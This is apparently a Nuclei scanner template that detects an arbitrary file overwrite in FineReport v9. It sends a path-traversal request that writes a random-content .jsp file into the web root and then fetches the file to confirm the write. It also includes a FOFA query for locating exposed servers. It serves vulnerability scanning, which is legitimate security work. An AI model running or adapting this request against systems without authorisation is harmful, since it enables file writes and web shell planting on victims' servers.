id: fine-report-v9-file-upload

info:
  name: FineReport v9 Arbitrary File Overwrite
  author: SleepingBag945
  severity: critical
  reference:
    - https://github.com/NHPT/WebReportV9Exp/blob/main/WebReport_Exp.
  metadata:
    max-request: 2
    fofa-query: app="帆软-FineReport"
  tags: finereport,fileupload,intrusive
variables:
  string: '{{rand_base(8, "abc")}}'
  filename: '{{rand_base(8)}}'

http:
  - raw:
      - |
        POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml;charset=UTF-8

        {"__CONTENT__":"{{string}}","__CHARSET__":"UTF-8"}
      - |
        GET /WebReport/{{filename}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: body_2
        words:
          - "{{string}}"

# digest: 4a0a00473045022100f9d16be4fb4062058a386fed5480ea11ca5954c365181bee55a7f4153a6ba13c02207fbb6aacd69768b7019873949262ce0f1ab85f83cee6892b50bb4bbd1edaf4de:922c64590222798bb761d5b6d8e72950